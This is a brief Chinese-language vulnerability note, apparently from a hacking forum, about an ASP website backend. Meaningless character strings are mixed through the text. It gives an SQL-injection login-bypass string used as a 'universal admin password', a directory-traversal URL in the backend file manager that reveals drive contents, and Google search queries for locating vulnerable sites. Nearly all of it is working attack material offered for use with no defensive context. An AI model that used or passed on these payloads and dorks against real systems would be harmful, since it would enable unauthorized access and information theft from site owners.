后台万能密码 'or'='or'- J! \( q* X3 K( R2 e
. _4 J. s2 q8 ]& ~1 x4 m后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
, q# q; X. K! w, I; f6 kadmin/uploadfile.asp?currentFolder=/upfiles/../8 @& a7 z/ e" G3 O$ g% z+ j8 Q
* B6 j+ P$ @3 g1 I* m9 e0 k2 O! v漏洞证明:
: ?1 X. k) E" c# U5 j
$ p: g, s/ ?" ^; F; e% Z' m谷歌:inurl:type.asp?id=1 新闻中心: Y- _0 g: a9 g8 B/ ^2 F" `
或者 :inurl:download_ok.asp?
1 }. O- q3 j% }! k! f
$ p; n# E2 u( Y |